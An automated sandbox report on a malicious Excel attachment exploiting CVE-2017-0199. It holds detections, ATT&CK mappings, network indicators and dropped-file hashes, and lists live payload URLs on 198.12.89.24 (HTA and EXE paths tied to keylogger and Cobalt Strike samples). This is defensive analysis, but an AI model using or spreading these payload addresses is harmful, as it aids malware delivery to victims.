Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: PO-ARJ-2025-15ACA.xla.xlsxStream path 'MBD003296A8/MBD00320C7F/Package' entropy: 7.98905669124 (max. 8.0)
Source: PO-ARJ-2025-15ACA.xla.xlsxStream path 'Workbook' entropy: 7.99170439258 (max. 8.0)
Source: 05550000.0.drStream path 'MBD003296A8/MBD00320C7F/Package' entropy: 7.98905669124 (max. 8.0)
Source: 05550000.0.drStream path 'Workbook' entropy: 7.95478130469 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 786Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts3
Exploitation for Client Execution
1
Scripting
1
Process Injection
3
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PO-ARJ-2025-15ACA.xla.xlsx39%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
PO-ARJ-2025-15ACA.xla.xlsx44%VirustotalBrowse
PO-ARJ-2025-15ACA.xla.xlsx100%AviraW97M/AVI.Agent.ziexl
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
    217.20.57.36
    truefalse
      high
      a726.dscd.akamai.net
      2.16.164.40
      truefalse
        high
        s-0005.dual-s-msedge.net
        52.123.129.14
        truefalse
          high
          s-part-0032.t-0009.t-msedge.net
          13.107.246.60
          truefalse
            high
            otelrules.svc.static.microsoft
            unknown
            unknownfalse
              high
              NameMaliciousAntivirus DetectionReputation
              http://198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.htafalse
              • Avira URL Cloud: safe
              unknown
              https://otelrules.svc.static.microsoft/rules/rule170146v0s19.xmlfalse
                high
                https://otelrules.svc.static.microsoft/rules/rule120201v19s19.xmlfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  198.12.89.24
                  unknownUnited States
                  36352AS-COLOCROSSINGUSfalse
                  13.107.246.60
                  s-part-0032.t-0009.t-msedge.netUnited States
                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1639278
                  Start date and time:2025-03-15 08:59:20 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 55s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                  Run name:Potential for more IOCs and behavior
                  Number of analysed new started processes analysed:21
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • GSI enabled (VBA)
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:PO-ARJ-2025-15ACA.xla.xlsx
                  Detection:MAL
                  Classification:mal60.winXLSX@4/13@1/2
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, SystemSettingsBroker.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.109.68.129, 199.232.214.172, 52.109.68.130, 13.89.179.8, 52.109.28.46, 20.42.65.84, 52.123.129.14, 172.202.163.200, 20.190.160.65, 2.16.164.40, 2.16.164.131
                  • Excluded domains from analysis (whitelisted): odc.officeapps.live.com, slscr.update.microsoft.com, europe.odcsm1.live.com.akadns.net, res-1.cdn.office.net, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, onedscolprdeus02.eastus.cloudapp.azure.com, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, c.pki.goog, wu-b-net.trafficmanager.net, ecs.office.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com, frc-azsc-000.odc.officeapps.live.com, uci.cdn.office.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, res-stls-prod.edgesuite.net, fe3cr.delivery.mp.microsoft.com, res-prod.trafficmanager.net, config.officeapps.live.com, osiprod-frc-bronze-azsc-000.francecentral.cloudapp.azure.com, onedscolprdcus06.centralus.cloudapp.azure.com, ecs.office.trafficm
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Report size getting too big, too many NtSetValueKey calls found.
                  TimeTypeDescription
                  04:01:30API Interceptor839x Sleep call for process: splwow64.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  198.12.89.24DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 198.12.89.24/xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated
                  DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 198.12.89.24/xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated
                  DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 198.12.89.24/xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated
                  wekissingbestgirleveryseenwithmygirl.htaGet hashmaliciousCobalt Strike, Snake Keylogger, VIP KeyloggerBrowse
                  • 198.12.89.24/312/cosse.exe
                  signed contract 01.xlsGet hashmaliciousUnknownBrowse
                  • 198.12.89.24/xampp/nso/wekissingbestgirleveryseenwithmygirl.hta
                  signed contract 01.xlsGet hashmaliciousUnknownBrowse
                  • 198.12.89.24/xampp/nso/wekissingbestgirleveryseenwithmygirl.hta
                  niceworkingskillwithbestideasevermade.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                  • 198.12.89.24/123/casse.exe
                  Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                  • 198.12.89.24/xampp/ncv/niceworkingskillwithbestideasevermade.hta
                  13.107.246.60https://protect-us.mimecast.com/s/wFHoCqxrAnt7V914iZaD1vGet hashmaliciousUnknownBrowse
                  • www.mimecast.com/Customers/Support/Contact-support/
                  http://wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5Get hashmaliciousUnknownBrowse
                  • wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comSecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                  • 217.20.57.19
                  SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                  • 217.20.57.19
                  1VjDy92IJ7.exeGet hashmaliciousScreenConnect ToolBrowse
                  • 217.20.57.36
                  ##U70b9#U51fb#U6b64#U5904#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U5305ZH_CN.exeGet hashmaliciousUnknownBrowse
                  • 217.20.57.18
                  ZoddLzy4r9.exeGet hashmaliciousLockBit ransomwareBrowse
                  • 217.20.57.19
                  SecuriteInfo.com.W32.Lolbas.A.tr.21840.28145.exeGet hashmaliciousScreenConnect ToolBrowse
                  • 84.201.210.39
                  SecuriteInfo.com.W32.Lolbas.A.tr.9491.8922.exeGet hashmaliciousScreenConnect ToolBrowse
                  • 84.201.210.23
                  SecuriteInfo.com.W32.Lolbas.A.tr.20709.27246.exeGet hashmaliciousScreenConnect ToolBrowse
                  • 217.20.57.20
                  SecuriteInfo.com.Other.Malware-gen.17831.10614.xlsxGet hashmaliciousUnknownBrowse
                  • 217.20.57.36
                  SecuriteInfo.com.W32.Lolbas.A.tr.2882.8256.exeGet hashmaliciousScreenConnect ToolBrowse
                  • 217.20.57.34
                  s-0005.dual-s-msedge.netAccount statement Payment release.xlsGet hashmaliciousUnknownBrowse
                  • 52.123.129.14
                  DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 52.123.128.14
                  (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                  • 52.123.129.14
                  DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 52.123.129.14
                  (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                  • 52.123.128.14
                  SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                  • 52.123.128.14
                  P0-0994-12.xlsGet hashmaliciousUnknownBrowse
                  • 52.123.128.14
                  DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 52.123.128.14
                  SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                  • 52.123.128.14
                  a726.dscd.akamai.netDHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 2.16.164.131
                  (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                  • 2.16.164.65
                  P0-0994-12.xlsGet hashmaliciousUnknownBrowse
                  • 2.22.242.9
                  SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                  • 2.22.242.145
                  SWIFTCOPY 20231707.docxGet hashmaliciousUnknownBrowse
                  • 2.22.242.128
                  SecuriteInfo.com.Other.Malware-gen.17831.10614.xlsxGet hashmaliciousUnknownBrowse
                  • 2.22.242.128
                  https://sp-track.info.socialmaud.digital/api/v1/track/click/355/30046/17/default/6b7d5c97-8b19-4c41-b355-64ecd84af44a?redirecturl=https://gamma.app/docs/POM-Technologies-Proposal-1tjhhormn8i5mpbGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                  • 2.22.242.145
                  2025-027RC2-ORDEN AVOCOMEX.xlsGet hashmaliciousUnknownBrowse
                  • 2.22.242.112
                  ess.doc1.rtfGet hashmaliciousUnknownBrowse
                  • 2.22.242.138
                  ess.doc1.rtfGet hashmaliciousUnknownBrowse
                  • 2.22.242.145
                  bg.microsoft.map.fastly.netnZsqQiT9Wr.lnkGet hashmaliciousUnknownBrowse
                  • 199.232.214.172
                  P0-0994-12.xlsGet hashmaliciousUnknownBrowse
                  • 199.232.214.172
                  DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 199.232.214.172
                  SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                  • 199.232.210.172
                  SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                  • 199.232.210.172
                  1VjDy92IJ7.exeGet hashmaliciousScreenConnect ToolBrowse
                  • 199.232.214.172
                  cfooce_wps_yan.exeGet hashmaliciousMicroClipBrowse
                  • 199.232.214.172
                  Kloptonium-beta.exeGet hashmaliciousUnknownBrowse
                  • 199.232.210.172
                  Antimony.exeGet hashmaliciousUnknownBrowse
                  • 199.232.214.172
                  ZoddLzy4r9.exeGet hashmaliciousLockBit ransomwareBrowse
                  • 199.232.210.172
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  AS-COLOCROSSINGUSAccount statement Payment release.xlsGet hashmaliciousUnknownBrowse
                  • 172.245.123.24
                  DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 198.12.89.24
                  (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                  • 192.3.95.138
                  DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 198.12.89.24
                  (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                  • 192.3.95.138
                  SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                  • 172.245.123.24
                  DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 198.12.89.24
                  SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                  • 172.245.123.24
                  (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                  • 192.3.95.138
                  MICROSOFT-CORP-MSN-AS-BLOCKUSAccount statement Payment release.xlsGet hashmaliciousUnknownBrowse
                  • 13.107.253.67
                  DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  P0-0994-12.xlsGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  P0-0994-12.xlsGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  258a5a1e95b8a911872bae9081526644DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  P0-0994-12.xlsGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  SecuriteInfo.com.Other.Malware-gen.8493.9635.xlsxGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  SecuriteInfo.com.Other.Malware-gen.17831.10614.xlsxGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  2025-027RC2-ORDEN AVOCOMEX.xlsGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  Quotation.xlsGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  Copy of 1- GCP Vendor Information Smart Form Stepan.xlsmGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  NEW_TENDER_LIST.xlsxGet hashmaliciousUnknownBrowse
                  • 13.107.246.60
                  No context
                  Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):118
                  Entropy (8bit):3.5700810731231707
                  Encrypted:false
                  SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                  MD5:573220372DA4ED487441611079B623CD
                  SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                  SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                  SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                  Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):20971520
                  Entropy (8bit):8.112143835430977E-5
                  Encrypted:false
                  SSDEEP:3:Tuekk9NJtHFfs1XsExe/t:qeVJ8
                  MD5:AFDEAC461EEC32D754D8E6017E845D21
                  SHA1:5D0874C19B70638A0737696AEEE55BFCC80D7ED8
                  SHA-256:3A96B02F6A09F6A6FAC2A44A5842FF9AEB17EB4D633E48ABF6ADDF6FB447C7E2
                  SHA-512:CAB6B8F9FFDBD80210F42219BAC8F1124D6C0B6995C5128995F7F48CED8EF0F2159EA06A2CD09B1FDCD409719F94A7DB437C708D3B1FDA01FDC80141A4595FC7
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):20971520
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                  SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                  SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                  SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):71
                  Entropy (8bit):4.3462513114457515
                  Encrypted:false
                  SSDEEP:3:Tuekk9NJtHFfs1XsExen:qeVJ8u
                  MD5:8F4510F128F81A8BAF2A345D00F7E30C
                  SHA1:8C711E6C484881ECDC83B6BDAC41C7A19EDE9C37
                  SHA-256:15AA8B35FC5F139EF0B0FBC641CAA862AED19674625B81D1DC63467BC0AAFED9
                  SHA-512:78695E5E2337703757903B8452E31A98F860022B04972651212C3004FEBE29017380A8BCA9FCCFD935DE00D8BD73AA556C30A3CEA5FC76E7ADF7E7763D68E78F
                  Malicious:false
                  Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..
                  Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:ASCII text, with very long lines (28720), with CRLF line terminators
                  Category:dropped
                  Size (bytes):20971520
                  Entropy (8bit):0.2044663538609004
                  Encrypted:false
                  SSDEEP:3072:GvQ+6+VjCJEbgob6NWIQuLocjFYBO/pO3:G8+VjCJhoGaE/q
                  MD5:7BD3B336757A1D1D7120D2CE6C781F85
                  SHA1:94B26D4913DCFD1793094BC948A89AB5938B11AF
                  SHA-256:FD39D85C0231F69397D7CABB0D5308C52948750A99BE7B135C28AEA126DA4E97
                  SHA-512:E06EE2EE0D0D5C63BD26EDF2C67A84FD71C88ED87BD6E4CE0A7784EBE4A176ADE63CF206633D25B6FE9E1156B6A9D7412D1E2719CF9E97AED44B664940EF19F0
                  Malicious:false
                  Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..03/15/2025 08:00:27.692.EXCEL (0x1DA4).0x1E1C.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2025-03-15T08:00:27.692Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-15T08:00:27.2398649Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-15T08:00:27.2398649Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-15T08:00:27.2398649Z\", \"C\" : \"\", \"Q\" : 8.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"
                  Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):20971520
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                  SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                  SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                  SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:ASCII text, with very long lines (28941), with CRLF line terminators
                  Category:dropped
                  Size (bytes):261554
                  Entropy (8bit):5.147220473702532
                  Encrypted:false
                  SSDEEP:1536:UeqUI3VVBeifU9Kyez5rvDO/8HEj4xTkaub22iCh4F762E9stjhkjHNFH8BBuVtn:DfIJU9AzBvD1SlFYBO/S2
                  MD5:7471AF10F0BEC9E074A1DE22708374DF
                  SHA1:DE41A46F5AE7556104D6F7DBEB73496FBFD7EE29
                  SHA-256:54C31807F5593A4FECCF747C608E6F34753905FDE6728B1B484DD71D90E15038
                  SHA-512:951C7D480B0CF9BFF6BA433F170BFAEF2264CC6ADE9C41B5C601F15DD7475CC20F9DEAF8BFCC5BAF8ADC92935CD398D237A06A7EC315797426C6CAF670DAB91F
